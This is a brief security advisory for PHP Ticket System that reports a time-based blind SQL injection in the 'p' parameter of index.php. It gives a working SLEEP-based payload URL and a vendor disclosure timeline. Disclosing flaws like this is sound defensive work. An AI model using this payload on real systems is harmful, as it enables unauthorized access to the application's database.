PHP Ticket System is a small PHP MySQL trouble ticket or work ordersystem that is a work in progress.
The 'p' parameter on index.php is vulnerable to SQL Injection.
A user must be signed in to perform this attack.
http://localhost/index.php?p=edit_ticket' AND SLEEP(5) AND 'yoUg'='yoUg&id=211&_=1334627588812
4/16/12 - Vendor Notified 4/17/12 - Vendor reponse, will be fixed in next release 4/24/12 - Disclosure